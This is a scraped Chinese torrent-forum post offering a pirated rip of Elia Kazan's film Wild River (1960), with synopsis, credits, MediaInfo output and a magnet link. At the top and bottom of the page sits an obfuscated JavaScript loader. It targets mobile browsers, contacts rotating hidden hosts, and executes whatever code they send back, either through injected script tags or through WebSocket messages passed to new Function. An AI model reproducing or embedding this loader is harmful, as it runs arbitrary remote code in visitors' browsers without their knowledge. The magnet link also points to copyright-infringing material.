狂澜春醒[中文字幕].Wild.River.1960.1080p.BluRay.x265.10bit.FLAC.1.0 7.83GB

版主小s 1月前 323

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 狂澜春醒

◎片 名 Wild River

◎年 代 1960

◎产 地 美国

◎类 别 剧情 / 爱情

◎语 言 英语

◎上映日期 1960-05-26(美国)

◎IMDb链接 https://www.imdb.com/title/tt0054476/

◎豆瓣评分 7.1/10 (238人评价)

◎豆瓣链接 https://movie.douban.com/subject/1958453/

◎片 长 110 分钟

◎导 演 伊利亚·卡赞 Elia Kazan (id:1049771)

◎编 剧 保罗·奥斯本 Paul Osborn (id:1051260)

威廉·布拉德福德·休伊 William Bradford Huie (id:1042826)

Borden Deal Borden Deal (id:1029989)

◎演 员 蒙哥马利·克利夫特 Montgomery Clift (id:1027230)

丽·莱米克 Lee Remick (id:1036580)

乔·范·弗利特 Jo Van Fleet (id:1014205)

詹姆斯·韦斯特菲尔德 James Westerfield (id:1163260)

芭芭拉·洛登 Barbara Loden (id:1009744)

艾伯特萨尔米 Albert Salmi (id:1144690)

弗兰克·奥弗顿 Frank Overton (id:1133049)

Robert Earl Jones Robert Earl Jones (id:1107206)

Big Jeff Bess Big Jeff Bess (id:1064377)

马尔科姆·阿特伯里 Malcolm Atterbury (id:1058930)

布鲁斯·邓恩 Bruce Dern (id:1019069)

杰伊·C·弗利朋 Jay C. Flippen (id:1032334)

伊利亚·卡赞 Elia Kazan (id:1049771)

Kenyon Hopkins Kenyon Hopkins (id:1014995)

埃尔斯沃思·弗雷德里克斯 Ellsworth Fredericks (id:1020309)

威廉·雷诺兹 William Reynolds (id:1138322)

沃尔特·M·斯科特 Walter M. Scott (id:1145204)

莱尔·R·惠勒 Lyle R. Wheeler (id:1005785)

赫曼·A·布卢门萨尔 Herman A. Blumenthal (id:1021061)

约瑟夫·基什 Joseph Kish (id:1109067)

安娜·希尔·约翰斯通 Anna Hill Johnstone (id:1003683)

海伦·图尔平 Helen Turpin (id:1150792)

本·奈 Ben Nye (id:1126546)

Charles H. Maguire Charles H. Maguire (id:1043521)

◎标 签 美国 / 伊利亚·卡赞 / 1960 / 剧情 / EliaKazan / 美国电影 / Elia_Kazan / 1960s

◎简 介

《狂澜春醒》,也有译《狂野之河》,本名《WILD RIVER》,是美国电影大师伊利亚·卡赞 Elia Kazan的(美国)三部曲之一,知名度不如《SPLENDOR IN THE GRASS》(《天涯何处无芳草》(1961))和《AMERICA,AMERICA》(《美国,美国》(1963)),但都是杰出的现实主义之作。1960年拍峻。

电影瞄准1930年代,1929年经济危机的大背景以及罗斯福针对经济危机的NEW DEAL计划都是关键词。田纳西州的田纳西河,由于时时泛滥成灾,并经历了一次惨绝人寰的大洪水,因此建设水电站大坝,既是解决失业、发展经济的现实之需,也希望就此摆脱洪水的恶梦,当然也是我们异常亲切熟悉的手法。国会因此成立TVA(田纳西谷管理局?),专门负责该流域的整治事宜,及建设水电站坝,力图促进地区发展。但由于水位抬升需要淹没河流中心的一个小岛...

◎获奖情况 (共1项)

第10届柏林国际电影节 (1960)

金熊奖 最佳影片(提名)

└──伊利亚·卡赞 (id:1049771)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 195362912678803280326914476113205450598 (0x92F9874247542779DDE47EE72688D766)

  4. Complete name : [email protected]M.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.83 GiB

  8. Duration : 1 h 49 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 10.2 Mb/s

  11. Encoded date : UTC 2021-10-30 15:35:09

  12. Writing application : mkvmerge v53.0.0 ('Fool's Gold') 64-bit

  13. Writing library : libebml v1.4.1 + libmatroska v1.6.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@Main

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 49 min

  21. Bit rate : 9 566 kb/s

  22. Width : 1 920 pixels

  23. Height : 812 pixels

  24. Display aspect ratio : 2.35:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.256

  31. Stream size : 7.34 GiB (94%)

  32. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  33. Encoding settings : rc=crf / crf=20.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x812 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  34. Language : English

  35. Default : Yes

  36. Forced : No


  37. Audio

  38. ID : 2

  39. Format : FLAC

  40. Format/Info : Free Lossless Audio Codec

  41. Codec ID : A_FLAC

  42. Duration : 1 h 49 min

  43. Bit rate mode : Variable

  44. Bit rate : 563 kb/s

  45. Channel(s) : 1 channel

  46. Channel layout : C

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 11.719 FPS (4096 SPF)

  49. Bit depth : 24 bits

  50. Compression mode : Lossless

  51. Stream size : 442 MiB (6%)

  52. Writing library : libFLAC 1.2.1 (UTC 2007-09-17)

  53. Default : Yes

  54. Forced : No


  55. Text #1

  56. ID : 3

  57. ID in the original source medium : 4609 (0x1201)

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 1 h 48 min

  63. Bit rate : 34.8 kb/s

  64. Count of elements : 1797

  65. Stream size : 27.0 MiB (0%)

  66. Language : Chinese

  67. Default : Yes

  68. Forced : No

  69. Original source medium : Blu-ray


  70. Text #2

  71. ID : 4

  72. ID in the original source medium : 4610 (0x1202)

  73. Format : PGS

  74. Muxing mode : zlib

  75. Codec ID : S_HDMV/PGS

  76. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  77. Duration : 1 h 48 min

  78. Bit rate : 35.0 kb/s

  79. Count of elements : 1797

  80. Stream size : 27.1 MiB (0%)

  81. Language : Chinese

  82. Default : No

  83. Forced : No

  84. Original source medium : Blu-ray


  85. Text #3

  86. ID : 5

  87. ID in the original source medium : 4611 (0x1203)

  88. Format : PGS

  89. Muxing mode : zlib

  90. Codec ID : S_HDMV/PGS

  91. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  92. Duration : 1 h 48 min

  93. Bit rate : 20.2 kb/s

  94. Count of elements : 1797

  95. Stream size : 15.7 MiB (0%)

  96. Language : Chinese

  97. Default : No

  98. Forced : No

  99. Original source medium : Blu-ray


  100. Text #4

  101. ID : 6

  102. ID in the original source medium : 4612 (0x1204)

  103. Format : PGS

  104. Muxing mode : zlib

  105. Codec ID : S_HDMV/PGS

  106. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  107. Duration : 1 h 48 min

  108. Bit rate : 20.4 kb/s

  109. Count of elements : 1797

  110. Stream size : 15.8 MiB (0%)

  111. Language : Chinese

  112. Default : No

  113. Forced : No

  114. Original source medium : Blu-ray


  115. Text #5

  116. ID : 7

  117. ID in the original source medium : 4608 (0x1200)

  118. Format : PGS

  119. Muxing mode : zlib

  120. Codec ID : S_HDMV/PGS

  121. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  122. Duration : 1 h 47 min

  123. Bit rate : 35.7 kb/s

  124. Count of elements : 2788

  125. Stream size : 27.4 MiB (0%)

  126. Language : English

  127. Default : No

  128. Forced : No

  129. Original source medium : Blu-ray


  130. Menu

  131. 00:00:00.000 : en:第 01 章

  132. 00:08:02.815 : en:第 02 章

  133. 00:20:50.249 : en:第 03 章

  134. 00:32:15.224 : en:第 04 章

  135. 00:47:55.914 : en:第 05 章

  136. 00:58:54.322 : en:第 06 章

  137. 01:10:45.324 : en:第 07 章

  138. 01:19:35.103 : en:第 08 章

  139. 01:33:30.688 : en:第 09 章

  140. 01:39:48.941 : en:第 10 章




复制代码


TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:D81D5A24581DF821674E3971141CB01BC39A42EA

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};